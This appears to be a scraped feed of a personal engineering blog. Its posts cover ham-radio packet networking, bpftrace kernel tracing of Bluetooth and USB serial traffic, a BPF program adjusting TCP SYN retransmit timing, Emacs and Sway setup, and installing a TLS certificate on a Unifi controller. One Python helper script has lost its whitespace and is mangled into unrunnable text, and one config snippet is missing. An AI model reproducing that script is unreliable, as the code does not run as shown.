Maybe it’s possible to patch the null cipher back into OpenSSH. I don’t know enough about the protocol to know if there are still “obscured meanings” left even then. But I’m also sceptical that this is the right path. With the roundtrip latencies (mentioned above) I don’t think I’d want a chatty protocol, but something where the protocol is designed to minimize roundtrips and be as quiet as possible.

In the olden days, before computer security was invented, people set up login terminals over ham radio. You can map callsigns to usernames for their login. This can be a cool proof of concept thing, but maybe best run inside a VM that gets periodically wiped, since anyone with a radio can do whatever they want to your connections.

Non-connected message passing and routing.

You can send messages via other stations. I’ve not yet tried sending any data via my local D-Star repeater, but I’m hoping that it can be routed back to me via my OpenSpot.

Look into NET/ROM, and ROSE

I have nothing to say about these yet, having not experimented with them.

Look into JNOS (not a typo)

“JNOS is first and foremost a router for ax.25, netrom, and ip protocols - ip over rf is possible by encapsulating the ip in ax.25 frames. It is a packet node, bbs, personal mailbox system, convers server (chatroom), offers a variety of tcp services, supports ax.25 tunnels (axip and axudp) over wired networks, supports ip encapsulation (ipip and ipdup) over wired networks” — What is JNOS?

In addition to links inline with the text.

Troubleshooting KISS with bpftrace

$
0
0

This is the troubleshooting story about me finding out why some packets were getting dropped when running AX.25 over D-Star DV between a Kenwood TH-D74 and an Icom 9700.

Troubleshooting: “Trouble”, from the latin “turbidus” meaning “a disturbance”. “Shooting”, from American English meaning “to solve a problem”.

The end result is this post, and this is the troubleshooting story.

The setup: laptop->bluetooth->D74->rf->9700->usb->raspberry pi.

I’m downloading from the raspberry pi, with the laptop sending back ACKs. But one of the ACKs is not getting through.

axlisten -a clearly showed that the dropped packet was being sent from the laptop:

radio: fm M0XXX to 2E0XXX-9 ctl RR6-

But nothing received on the receiver side. I saw the D74 light up red to TX, and the 9700 light up green on RX, but then nothing. Error counters in ifconfig ax0 were counting up on the receiver side. So something is being sent over the air.

And it wasn’t the first packet. All the ones before it were fine. They were always fine. This packet was always dropped. It was always only that packet that caused it to stall. The window size was set to 2, so session establishment, RR0, RR2, and RR4 went through just fine. But RR6 keeps getting re-sent, and never gets there.

I tried slowing down the sender on the raspberry pi. Now it no longer stalled! Note that I didn’t say that RR6 arrived. It actually didn’t. But because the window size was 2 the raspberry pi would send another data packet, acked by RR7, which would arrive just fine and ACK everything up to there.

Is the packet being sent to the radio correctly? Is the radio actually sending it over the air correctly? Is it received? Is it being sent via serial to the receiving computer?

This sounds like something kernel tracing would help with. I could start sniffing the radio traffic using an SDR, but I wasn’t looking forward to banging my head against demodulating D-Star. Seems like I’ll do that if I have to, but will try pure software first.

And remember this is the kernel (AX.25 layer) sending data to the KISS driver, which in turn sends it on to the serial port (which in turn is USB or Bluetooth, in my case). So it’s not in user space at any point. I can’t just strace.

I search around the kernel source for rfcomm (bluetooth) and ax25, and find some functions that may tell me when something is sent, and what it is.

kprobe:ax25_kiss_rcv {
  printf("rx %p\n", arg1);
}
kprobe:ax25_queue_xmit {
  printf("tx\n");
}

This seems to confirm that I have some good endpoints. I see that the packet is being sent, and not received. Let’s go one level lower on the receiver side.

kprobe:ax25_kiss_rcv {
  printf("ax25 recv %s\n", kstack);
}
kprobe:mkiss_receive_buf {
  printf("mkiss_receive_buf\n");
}

Here I see that the KISS driver is receiving something, but it doesn’t get to the AX.25 layer.

What could the KISS layer on the laptop actually be sending to the radio?

Dumping what’s actually sent to the D74

I couldn’t immediately find any good way to dump payload (but see below), so I just printed the bytes as a string, for decoding in Python. Though this may not work if the packet has nulls in it, I’ve not tested it (again, see below)..

kprobe:rfcomm_tty_write {
  printf("%d\n%s", arg2, str(arg1, arg2));
}
#!/usr/bin/python3f=open('complete-trace')whileTrue:l=f.readline()ifl=='\n':continueifl=='':iff.read(1)!='':raise"Wat"breakl=l.strip()n=int(l)data=f.read(n)print(' '.join(["%02x"%ord(x)forxindata]))open('t.dat','w').write(data)

Output:

c0 80 9a 60 a8 90 86 40 e4 9a 60 a8 90 86 40 61 3f 78 a5 c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 51 f9 4f c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 91 f9 1f c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 d1 f8 ef c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0
c0 80 9a 60 a8 90 86 40 64 9a 60 a8 90 86 40 e1 11 f8 bf c0

Note the 5 repeats of the last packet. That’s the RR6 packet that’s not getting there, repeated. Yeah, so far it looks like it’s getting to the sending radio. But what are those two bytes in the end? I don’t see those in my tcpdumps. A checksum? And what’s with that 0x80? That should be 0x00 indicating a data frame, right?

Looking in the kernel source I see that there’s a checksum added to the KISS stream sometimes (also mentioned in dmesg). That’s odd, I didn’t see that on the wikipedia page.

Reading the kernel code it looks like there are two checksum standards (why just one? that’d be too easy). If you send data to TNC port 8 (via command 0x80), then it’s one checksum system. If you send via port 2 using command 0x20 it’s another. Super. This is a different kind of “port” from TCP port and axports, by the way.

Since the checksum is for KISS, meaning for use between the computer and the TNC, it seems useless for me. Bluetooth/USB serial won’t corrupt data, right? I try kissparms -p radio -c 1 to turn off checksums, and it works! So the checksum is calculated wrong? Seems unlikely, since it works for every other packet. Also I seem to still have more intermittent corruption that’s unexpected.

But yeah, maybe the checksum calculation is just wrong? Nah, it wouldn’t affect just this packet, and with both CRC algorithms.

Back to printing the payload.

There’s a better way in the next version of bpftrace (it’s not in v0.10.0, which is the latest release as of time of writing): The buf() function and %r format specifyer. So I download and compile git HEAD.

Here’s a bluetooth serial sniffer bpf program using this new better way:

#include <linux/skbuff.h>
#include <linux/tty.h>
kprobe:rfcomm_tty_write
{
  $tty = (struct tty_struct*)arg0;
  // Optionally print $tty->index
  printf("TX %d %r\n", arg2, buf(arg1, arg2));
}
// Other interesting functions:
// * kprobe:rfcomm_recv_data
// * kprobe:rfcomm_tty_copy_pending
kprobe:rfcomm_dev_data_ready
{
  $skb = (struct sk_buff*)arg1;
  $buf = buf($skb->data, (int64)($skb->len));
  printf("RX %d %r\n", $skb->len, $buf);
}

This is example output on the laptop side, where we see the received probes from the remote end, and the ACKs that get dropped transmitted (it’s not quite the same payload, because I experimented with different SSIDs):

[…]
RX 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0d\x8a`\xac\x9a\x84s\x11\x05\xff\xc0
TX 20 \xc0\x80d\x8a`\xac\x9a\x84r\x9a`\xa8\x90\x86@\xe1\x11\xea\xd5\xc0
RX 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0d\x8a`\xac\x9a\x84s\x11\x05\xff\xc0
TX 20 \xc0\x80d\x8a`\xac\x9a\x84r\x9a`\xa8\x90\x86@\xe1\x11\xea\xd5\xc0
RX 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0d\x8a`\xac\x9a\x84s\x11\x05\xff\xc0
TX 20 \xc0\x80d\x8a`\xac\x9a\x84r\x9a`\xa8\x90\x86@\xe1\x11\xea\xd5\xc0

This shows the same thing. All the way to the Bluetooth layer it’s correct. So I’d say it’s either getting dropped over-the-air, by the receiving radio, or by the receiving linux kernel.

But because the checksum is wrong the packets don’t make it to the AX.25 layer, so they can’t be seen with tcpdump or axlisten there.

So I make another bpftrace program to sniff reception on the serial level.

#include<linux/tty_ldisc.h>
#include<linux/tty.h>
#include<linux/skbuff.h>

/*
// Sniff the serial data on the KISS layer.
kprobe:mkiss_receive_buf
{
  $tty = (struct tty_struct*)arg0;
  $data = arg1;
  $buf = buf($data, (uint64)(arg3));
  printf("RX KISS (pre CRC) %s %d %r\n", arg3, $tty->tty->index, $buf);
}
*/

// Sniff on the tty layer.
kprobe:tty_ldisc_receive_buf
{
  $tty = (struct tty_ldisc*)arg0;
  $p = arg1; // data
  $count = arg3;
  $buf = buf($p, (uint64)(arg3));
  $name = str($tty->ops->name);
  $num = $tty->tty->index;
  if ($name == "mkiss") {
    printf("RX (pre CRC) %s(%d) %d %r\n", $name, $num, arg3, $buf);
  }
}

Annotated results:

# laptop: Probe received
RX (pre CRC) mkiss 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0\x9a`\xa8\x90\x86@s\x11\xc6\xd9\xc0

# laptop: Probe got through CRC check
RX 20 \xc0\x80\x9a`\xa8\x90\x86@\xe0\x9a`\xa8\x90\x86@s\x11\xc6\xd9\xc0

# laptop: Resending ACK
TX 20 \xc0\x80\x9a`\xa8\x90\x86@r\x9a`\xa8\x90\x86@\xe1\x11\x1e\xdf\xc0

# raspberry pi: ACK bytes received
RX (pre CRC) mkiss 3 \xc0\x80\x9a
RX (pre CRC) mkiss 3 `\xa8\x90
RX (pre CRC) mkiss 3 \x86@r
RX (pre CRC) mkiss 3 \x9a`\xa8
RX (pre CRC) mkiss 3 \x90\x86@
RX (pre CRC) mkiss 3 \xe1\x1e\xdf
RX (pre CRC) mkiss 1 \xc0

# Nothing else. ACK didn't get through CRC check.

See the problem? 20 bytes sent. 19 arrives. 0x11 is gone. Of course the checksum fails. But how can it just disappear? And it’s like this every time for this packet.

After some more testing it seems that yes, all 0x11 bytes are lost. I can’t send packets with 0x11 in them!

What’s so special about 0x11? It’s flow control bytes for XON/XOFF.

The radio is stripping 0x11 and 0x13 (also confirmed) out because they are flow control characters.

Some more testing also showed that the radio sends these characters for flow control, so intended ones get dropped, and then extra ones are added.

While searching for a way to escape these bytes (it’s apparently protocol-dependent, and not as simple as “the XON/XOFF way”. In fact wikipedia says “This is frequently done with some kind of escape sequence”. “Some kind of”… thanks.

While looking through the 9700 advanced manual on page 10-22 I come across a note that only ASCII is supported. Oh. Oh they mean this is only for printable characters, don’t they?

This is when I open minicom directly against the ports, start typing, and realize that I’m not working with a KISS TNC-like interface at all, no. Every character I type is immediately and correctly sent and received. The KISS communication I was almost successfully using to send AX.25 packets was actually between the two linux kernels, not between computers and radios.

I was talking KISS to myself, not to the radios!

All the 0xC0 escapes, 0x80 command, and everything else, was just a stream of bytes to the radios, to be sent as-is. Even though they’re not printable ASCII characters, the radio only bothers to drop the XON/XOFF characters.

Oh.

Well, I learned bpftrace. So there’s that.

Also I learned that I should real the manual more carefully. In my defense it’s three manuals, totalling 296 pages.

Transferring pictures with DStar

$
0
0

I’ve successfully experimented with sending pictures using the data portion of D-Star.

I did it in multiple ways, starting with the simplest and ending with the longest path (though not most complex).

Equipment is an Android phone, a Kenwood TH-D74, and an ICom IC-9700.

Simplex

First I did it the simplest way, using simplex between the radios.

You install the ICom RS-MS1A app (sigh, yes that’s the kind of useful naming scheme they have). You’d think this app is needed for the ICom radio, but no. The IC-9700 has Picture mode built in. I used this app for the Kenwood D74.

You start the app, select “Others (Bluetooth)”, and select the D74.

On the D74 you need to:

  1. Press 1 to go into VFO mode
  2. Select the right frequency
  3. Set the mode to digital (DV/DR)
  4. If it’s DR, switch it to DV in the digital menu.
  5. In the digital menu, switch it to DATA

Annoyingly, unlike the native picture mode in the IC9700, setting DATA mode on the D74 will not allow any voice transmission at all.

On the IC9700, just set the right frequency, switch to DV mode, and select Picture from the menu.

I won’t go into detail on how to actually trigger the TX, but it’s pretty simple. It’s better explained by video, and there are some already.

Via my own reflector

This was the most complex setup.

Before annoying people on real repeaters and reflectors with my tests I wanted it to test it out on my own. I spun up a VM on GCP and set up a test reflector using these instructions. It was pretty straightforward except that I had to change /etc/init.d/xlxd to bind to 0.0.0.0 instead of the address it picked.

I arbitrarily named my reflector XLX949, but I would only be connecting to it by DNS name anyway, so it doesn’t matter.

I used an OpenSpot2 to connect the D74 to this reflector.

On the IC9700 I set it to Terminal Mode (where it’s just an expensive interface to the Internet, no RF at all), and connected it to the VM I’d set up. I got everything rejected until I set my settings to:

  • My station: 2E0VMB (by Intermediate license call sign)
  • Gateway callsign: 2E0VMB A
  • Your call: /XLX949B
  • R2: 2E0VMB G
  • R1: 2E0VMB A

Then it worked, and I could send pictures so that they would go:

IC9700->my reflector->OpenSpot2->D74->Android Phone

By the way, very few reflectors support radios in Terminal Mode (seems only XLX227D and XLX555A,B,C,D). Here are the standard XLX reflector addresses though.

Via a real repeater and reflector

My local repeater was connected to DCS005B, so I connected my OpenSpot2 to that too, and put the IC9700 in Normal Mode.

I could not get the double-speed TX ALL to work through this. I’m guessing either the repeater or reflector doesn’t want full data without voice. So I used the normal Pict TX, and talked through the transmission.

Obviously I listened first to make sure I wasn’t interrupting anything, and used small low quality photo settings so that I wouldn’t tie up the reflector and all connected repeaters for too long.

Anyway, this worked right away, and my new path was:

IC9700->My local repeater (GB7OK)->Reflector (DCS005B)->OpenSpot2->D74->Android phone

But why

This means when phone service is down or just doesn’t have coverage I’d be able to send and receive photos. Even using just what I’d have in my pockets. And when phone service is unavailable, that’s when you really want to be able to communicate, to help yourself or others. As long as the nearby D-Star repeater has Internet access, that communication is world wide.

Measuring USB with bpftrace

$
0
0

File usb-bw.b:

#include <linux/usb.h>

interval:s:1 {
  printf("--------------------------\n");
  print(@total);
  print(@sum);
  clear(@sum);
  clear(@total);
}

kprobe:__usb_hcd_giveback_urb {
  $urb = (struct urb*)arg0;
  $dev = $urb->dev;
  @total = stats((uint64)$urb->actual_length);
  @sum[$dev->descriptor.idVendor,
       $dev->descriptor.idProduct,
       str($dev->product),
       str($dev->manufacturer)] = stats((uint64)$urb->actual_length);
}

Example run with a USB stick idling (appears to be probed once every two seconds), and starting and stopping some GNURadio sniffing with an USRP B200 at 10Msps:

$ sudo bpftrace usb-bw.b
Attaching 2 probes...
--------------------------
@total: count 317, average 20, total 6641

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 315, average 20, total 6597
@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44

--------------------------
@total: count 6807, average 20, total 136552

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 6807, average 20, total 136552

--------------------------
@total: count 8507, average 20, total 170852

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 8505, average 20, total 170808
@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44

--------------------------
@total: count 979, average 20, total 20288

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 979, average 20, total 20288

--------------------------
@total: count 2141, average 7319, total 15670428

@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44
@sum[9472, 32, USRP B200, Ettus Research LLC]: count 2140, average 7326, total 15678560

--------------------------
@total: count 5077, average 7891, total 40066648

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 5078, average 7890, total 40066648

--------------------------
@total: count 5080, average 7888, total 40074868

@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44
@sum[9472, 32, USRP B200, Ettus Research LLC]: count 5079, average 7890, total 40074824

--------------------------
@total: count 5077, average 7891, total 40066648

@sum[9472, 32, USRP B200, Ettus Research LLC]: count 5077, average 7891, total 40066648

--------------------------
@total: count 2456, average 8009, total 19670524

@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44
@sum[9472, 32, USRP B200, Ettus Research LLC]: count 2455, average 8015, total 19678656
--------------------------


--------------------------
@total: count 2, average 22, total 44

@sum[4871, 357, USB Mass Storage Devie, USBest Technology]: count 2, average 22, total 44

It’s not the prettiest, but it’s interesting. Note that the Product and Vendor IDs are in decimal. I couldn’t find a way to convert them to hex in bpftrace.


A smarter emacs

$
0
0

I’ve been running Emacs for like 25 years. But I’ve never really configured it with anything fancy.

Sure, I’ve set some shortcut keys, and enabled global-font-lock-mode and set indent size, but that’s almost it.

All my coding is done in tmux&Emacs. One project gets exactly one tmux session. Window 0 is emacs. Window 1 is make && ./a.out (sometimes split panes to tail logs or run both server and client), and to run git commands. The remaining windows are used for various things like reading manpages etc….

I have that same workflow whether I’m editing a blog post or doing kernel programming.

This way I can work at my desk with large and plentiful screens, and then move to my laptop and everything continues working exactly the same.

tmux I’ve customized, but not that much with Emacs.

So, step one to get my coding environment to be less 1995, and more 2020: make my editor understand my code, and show me stuff about it.

I’m learning as I’m going, and writing what I’m learning. As always if you see something wrong then please leave a comment.

Code annotations and other semantic understanding

The way to do this is to make your editor talk the Language Server Protocol (LSP) with something that understands the language. For C++ that’s clangd.

apt install clangd lsp-mode

Then we need to make this LSP thingy understand how to compile the code. That’s a bit tricky since there may be system-local defines and stuff. You may have had to provide flags to ./configure to make it build.

This information needs to end up in a file called compile_commands.json

The way I found to do this is using scan-build.

pip install scan-build
cat >> Makefile.am
lsp:
	~/.local/bin/intercept-build make
^D
./bootstrap.sh && ./configure && make clean && make lsp

Now we just need to activate it in Emacs. That’s done by (lsp t). But better yet, let’s trigger it when loading C++ code.

Let’s add this to ~/.emacs.d/init.el:

(add-hook 'c++-mode-hook 'development-mode)
(defun development-mode ()
  "Start dev stuff"
  (interactive)
  (lsp t)
  (setq show-trailing-whitespace t)
  (setq indent-tabs-mode nil))

Ok, that looks WHAT THE FUCK?!

Ugly colors

Ok, after some searching lets add this to ~/.emacs.d/init.el` too:

Good colors

Ok, that’s better. And we get nice context aware tab completion. Ok, now I feel like I’ve joined the 21st century.

Auto-format code on save

clang again comes to the rescue. Specifically clang-format.

apt install clang-format

And more for ~/.emacs.d/init.el:

(defun clang-format-save-hook-for-this-buffer ()
  "Create a buffer local save hook."
  (add-hook 'before-save-hook
    (lambda ()
      (progn
        (when (locate-dominating-file "."".clang-format")
          (clang-format-buffer))
        ;; Continue to save.
        nil))
    nil
    ;; Buffer local hook.
  t)
)
(add-hook 'c++-mode-hook (lambda () (clang-format-save-hook-for-this-buffer)))

From Stackoverflow.

Summary

There, now I’ve advanced the state of my programming environment by about 20 years. If you were already doing this in 1995, then good for you.

BPF: The future of configs

$
0
0

BPF has some wow-presentations, showing how it enables new performance measuring and tracing. Brendan Gregg has a whole bunch, for example. But I don’t think’s it’s very well explained just why BPF is such a big deal.

Most of the demos are essentially cool and useful looking tools, with an “oh by the way BPF made this happen”. Similar to how it’s common to see announcements about some software, where the very title of the announcement ends with “written in Go”. It gives a vibe of “so what?”.

If you’re interested in system tooling and configuration, and aren’t already aware of BPF, then this is for you.

I’m not an expert on BPF, but this will hopefully help someone else bootstrap faster.

bpftrace

bpftrace is really cool. Clearly it’s inspired by dtrace. But one should not mistake bpftrace for BPF. bpftrace is only yet another tool that uses BPF, albeit one that allows you to create trace points in a domain specific language.

This is not the full power of BPF. It’s not at all the big picture.

BPF and configs

Let’s take packet filtering as an example. Once upon a time in Linux there was ipfwadm. I bet there are people reading this who were not born when we moved off of that. Hell, its sequel ipchains is not exactly new either. After that came iptables. iptables still works, and is probably the most popular still, but technically it’s replaced by nftables.

What all these have in common is that they are configs. They’re data. They provide a list of rules, and a rule engine goes through the rules, one by one, and finds a “matching rule” and performs an “action”.

In other words the user starts with an intent, and encodes that in a configuration, which in turn is checked for every packet.

The problem with that is if something cannot be encoded in the config, then it’s not possible to make the packet filter do it. Sure, every generation of tooling made more things possible to configure, but it’ll never be complete.

OpenBSD has instead improved and expanded what pf can do, but there too you are at the mercy of what’s possible to encode in the configuration.

E.g. what you you want to filter all packets whose source and destination port are the same? The only option I can think of is to create 65536 separate rules (times two for TCP/UDP), which is not only messy, but also affects performance, since they’ll be evaluated for every packet sequentially.

Classic solution

The classic solution to these special configurations is to add an interface between userspace and the kernel, and have the kernel ask a daemon what to do.

This has many drawbacks:

  • what should happen if the userspace daemon crashes?
  • userspace/kernel context switches are expensive, and here we need two of them per packet
  • Both sides have to be configured. The kernel needs a configuration to know it’s supposed to ask userspace, and userspace needs to “connect” to that.
  • Complex kernel/userspace interfaces is where kernel bugs happen
  • Ok, that’s great for iptables. But what about all the other configs? Should they all create this type of link?

BPF solution

BPF does not deal in configuration, but in code. BPF allows you to load code into the kernel (in a safe way), and you’re not constrained by what can be encoded in rules.

For our example you don’t tell the kernel to drop packets with source port equal to destination port, you upload a program that hooks in to “packet received”. You tell the kernel run this code to know what to do with that packet.

There’s even bpftables now. I wouldn’t say that it completely removes the need for iptables & nftables, but it removes the need for the kernel portion of them. iptables/ntfables userspace could compiler to BPF, and all rule processing code could be removed from the kernel.

And so it goes for all configurations and settings.

This is a big deal.

Taking this to the extreme

You could remove the routing table code from the kernel (a routing table is a configuration), and have a BPF program decide the next hop. This may sound strange to you, but if you’ve every done policy routing under Linux, with ip rule and numbered routing tables, then this may make more sense.

Maybe more realistic is to rip out the support for more than the default routing table, and allow creation of userspace domain specific languages that just upload the code to the kernel.

You could implement filesystem access controls in a BPF program, and rip out unix filesystem permissions code. Maybe not a good idea, but you could.

Did you know that in Linux you can customize the TCP initial congestion window and receive window by applying attributes to the routing table entry? That’s clever. But if you want to set the cwnd based on port, then the “cleanest” way is probably to use iptables to -j MARK packets on those ports, then ip rule to change routing table, and then create a new routing table as a copy of the default one but with these settings changed. And remember to update both tables when you need to change one. I said “cleanest”, not clean.

With BPF you can just hook into sockops on the BPF_SOCK_OPS_ACTIVE_ESTABLISHED_CB operation, and change it based on any criteria you want.

What I have actually done with BPF

Measure USB traffic, but the idea has more potential

This uses the bpftrace tool, and thus doesn’t use the full power of BPF. My code in the domain specific language compiles into BPF that hooks into specific function calls in the USB stack.

As I understand it BPF would allow me to hook into those same places and override the function return value. That way I could create a firewall for USB.

Imagine how much work it would be to create a USB firewall without BPF. You would have to:

  • specify a configuration language
  • add a way to upload a config to the kernel
  • create the user language
  • create command line tooling for it
  • convince kernel developers to accept your patches
  • convince distribution vendors to add your tools to the OS

And then it wouldn’t be available on all Linux systems until a few years later when kernels and distributions pick it up.

It would literally take years to make this available to people. With BPF you could do it in a weekend, and other people could start using it without them even needing to reboot.

Set default retransmit time

By default Linux retransmits a SYN packet after 1 second, if there is no response. Then exponentially after 2 more seconds, then 4 more, etc…

While playing with LoRa and AX.25 this timer has caused problems. The problem is that under some settings it can take more than a second (actually in the slowest LoRa mode over 5 seconds) to send the SYN packet. This means that as soon as the SYN is done sending, the retransmit gets sent too. This ties up the radio for another 5 seconds, and likely prevents the reply from being received (my LoRa hardware doesn’t seem to be able to listen before transmit (LBT), and therefore doesn’t do CSMA).

I wouldn’t say that the interface is intuitive (it took me a few hours to find a way to compile and load the code), but once you know how, it’s simple.

#include<linux/bpf.h>
#define SEC(NAME) __attribute__((section(NAME), used))

// TODO: assumes little-endian (x86, amd64)
#define bpf_ntohl(x)  __builtin_bswap32(x)

SEC("sockops")
int bpf_sockmap(struct bpf_sock_ops *skops)
{
  skops->reply = -1;
  // TODO: filter on outgoing interface
  if (bpf_ntohl(skops->remote_port) != 12345 && skops->local_port != 12345) {
    return 0;
  }

  const int op = (int) skops->op;
  if (op == BPF_SOCK_OPS_TIMEOUT_INIT) {
     // TODO: this is in jiffies, and despite `getconf CLK_TCK` return 100, HZ is clearly 25 on my kernel.
     // 5000 / 250 = 20 seconds
     skops->reply = 5000;
     return 1;
  }
  return 0;
}
char _license[] __attribute((section("license"),used)) = "GPL";
int _version SEC("version") = 1;

Compile & load using clang (apt install clang llvm) and bpftool (kernel sources in tools/bpf/bpftool):

# I needed kernel headers. Preferably for the kernel you're actually running.
CFLAGS="-I/usr/src/linux-source-4.19/usr/include/"
# Compile
clang $CFLAGS -target bpf  -Wall -g -O2 -c set_rto.c -o set_rto.o
# Remove any previous version from the kernel
sudo bpftool cgroup detach "/sys/fs/cgroup/unified/" sock_ops pinned "/sys/fs/bpf/set_rto"
sudo rm -f /sys/fs/bpf/bpf_sockop
# Load the new version.
sudo bpftool prog load set_rto.o  /sys/fs/bpf/bpf_sockop
sudo bpftool cgroup attach /sys/fs/cgroup/unified/ sock_ops pinned /sys/fs/bpf/set_rto
  • https://github.com/zachidan/ebpf-sockops
  • Brendan Gregg
  • https://fly.io/blog/bpf-xdp-packet-filters-and-udp/
  • https://github.com/iovisor/bcc/blob/master/docs/reference_guide.md
  • https://technodocbox.com/91371073-Internet_Technology/Tcp-bpf-programmatically-tuning-tcp-behavior-through-bpf.html

Bypassing safety check for an obviously safe change

$
0
0

This is less concrete technical than my usual blog post.

For every 100 changes we’re 99% sure won’t cause an outage, one will

It’s actually hard to be 99% sure of anything. I’m not 99% sure today’s Thursday. I say that because more often than one day in a hundred, I’ll think “hmm… feels like Wednesday” when it’s not.

I just closed my eyes and tried to remember what time it is. I don’t think I can guess with 99% accuracy what hour I’m in. (but to be fair, it’s de-facto Friday afternoon today, as I’m off tomorrow).

Anyway… the reason I say this is that this should be kept in mind every time someone comes and says they want to circumvent some process for a change that they are absolutely sure won’t cause an outage, that can actually be put into numbers. And those numbers are “you are not 100% sure of anything”.

By saying you are 99% sure this won’t cause an outage (and are you right about that?) you are saying that for every 100 requests like yours that will bypass normal checks, there will be an outage. You are taking on an amortized 1% of the cost of an outage for your change by bypassing the safety barriers.

And now I realize where my thinking of this comes from. It’s from Eliezer Yudkowsky on Infinite Certainty.

Or is it? I can’t be 100% sure…

Tiling window manager

$
0
0

A couple of months ago it occurred to me that I’ve been manually tiling my windows. That is, I use all the screen real estate, and don’t have windows overlapping each other.

In various window manages (and on Windows) I have used Super+Left and Super+Right to divide the screen 50/50.

So why am I not running a tiling window manager? That’s literally what they do, and they allow more flexibility in how to tile, without wasting space.

Switching to tiling

A quick googling says that i3 is what I want. Fast, small, efficient. No bells and whistles.

I used it for a little while, but then because I wanted to make it even harder on myself, err… I mean to join the 21st century, I thought I’d switch from X11 to Wayland, too. Luckily there’s a Wayland Compositor that’s equilavent to the i3 Window Manager called Sway.

It’s great! I knew X11 and Gnome had issues, but I didn’t realize just how much better I feel when I don’t have to deal with their deficiencies.

Like:

  • screen tearing when scrolling in terminal windows
  • changing focus can take up to a second, sometimes
  • X11 resets keyboard settings when it bloody feels like it, in addition to every single time you plug/unplug a keyboard

Wayland’s not been entirely smooth sailing though:

Terminals

Now that the biggest issues with performance were gone, it became more noticeable that gnome-terminal is pretty slow too. Reading my email in my text client I noticed that merely scrolling through an email could take 45% CPU on a modern machine. That’s ridiculous, even if it’s a full height window on a 4k monitor, thus many pixels.

At first I thought it was due to my email client not being efficient at rendering. After all, it redraws the whole text buffer from scratch when you scroll. So I implemented scrolling using terminal escape codes.

Curiously that didn’t help at all. Oh well, at least it improves screen tearing on X11, and reduces network use when run through SSH.

I got a recommendation to use the terminal foot. Terrible name. But in the spirit of i3 and Sway (and being native Wayland), it looked pretty neat. And yes, much faster.

I had to adjust the colors. The default ones were very muted.

One mayor drawback though is that it does not support tabs. But Sway does support tabs for windows, so why do I need tabs both in the WM (ehem, compositor) and in the terminal?

After trying it as-is, it turns out that I really want to be able to cycle through the tabs inside the same “visual space”, and moving to another window is something else to me entirely. Similar to how when I move away from the browser window, I move away from all the browser tabs, but moving between browser tabs is a completely different conceptual thing.

What I want shortcuts for:

  • “if focus is inside a tabbed container, go out of that tabbed container and to the left” (or up, down, right, whatever)
  • “go to the next tab. If it’s the last tab, cycle back to the first one”
  • “jump directly to tab number N”

Neither foot nor Sway support this. But Sway supports dumping a JSON representation of the layout, and it supports sending navigation commands.

So I made a shell script that takes the JSON layout, locates the currently focused window, and does what I want.

I felt kinda icky having Sway execute my script, which in turn does three more exec() calls (and all the other syscalls to fork() and shuffle data between them), just to “focus next window”. Running the script took about 50ms, too. Not really a problem, but could be noticeable on a loaded system with many more windows.

So I rewrote it in C++, using simdjson. Turns out the JSON parsing and querying of jq was the biggest time thief. But now it’s down to being so fast time often claims it’s 0.000s of CPU time.

Possibly the jq query could be optimized, but I wanted to not even waste time loading four binaries (swaymsg, bash, jq, and swaymsg again) to select the next window. I don’t even particularly like the one exec() call.

And now I can configure moving around the way I want it.

And if I have other fancy nav things I want to do I have the library to get started.

In conclusion

I highly recommend tiling window managers, and i3 and Sway in particular. I run Sway both on my laptop and on my dual monitor desktop. Sway also handles unplugging/replugging the extra monitor much better, where Gnome just left a horrible mess.

And I recommend simdjson for all your JSON parsing needs. It’s really fast, and a nice modern C++ API.

Unifi controller with a real cert

$
0
0

I finally got sick of seeing a certificate error when connecting to my Ubuiquiti Unifi WiFi controller.

There are a bunch of shitty howtos describing how to install a cert, and one good one. But in order to make it more copy-paste for future me when the certificate needs renewing, and because the paths are not quite the same since I run the controller in a Docker container on a raspberry pi, here are the commands (after copying fullchain.pem and privkey.pem into the stateful data dir):

host$ docker ps  # make note of the docker ID
host$ docker exec ID_HERE -ti bash
docker$ openssl pkcs12 \
        -export \
        -inkey privkey.pem \
        -in fullchain.pem \
        -out cert.p12 \
        -name unifi \
        -password pass:secret
docker$ keytool \
        -importkeystore \
        -deststorepass aircontrolenterprise \
        -destkeypass aircontrolenterprise \
        -destkeystore /usr/lib/unifi/data/keystore \
        -srckeystore cert.p12 \
        -srcstorepass secret \
        -alias unifi \
        -noprompt
docker$ exit
host$ docker stop ID_HERE
host$ docker start ID_HERE

I’m mostly happy with the Ubiquiti access points. I have an AP-AC-LR and an AP-M. My complaints are:

  • When I reported a bug about access to SSH on non-management interfaces, they responded by turning off management over IPv6 alltogether.
  • Even their latest firmware doesn’t support UNII-3 channels, which have been allowed in UK since 2017, and DFS-free since mid-2020.
  • You can’t select fallback channel when DFS channels detect radar, so you may end up with both APs on the same channel.

I solved some of the channel mess by creating two “sites”. One “in the US” running on UNII-3, and since it’s DFS-free there’s no risk of both APs ending up on the same channel.

This works great for everything except with:

  • Google Pixelbook
  • Google Nest
  • Google Chromecast

They absolutely refuse to connect to an UNII-3 channel. Apparently because the manufacturer chose to hard code this, non-upgradable, and not simply trust the AP. So I just live with them connecting to the other AP. My home is not that big.

Apple devices, Pixel 3 phone, Lenovo etc… etc… are all fine.

Viewing all 112 articles
Browse latest View live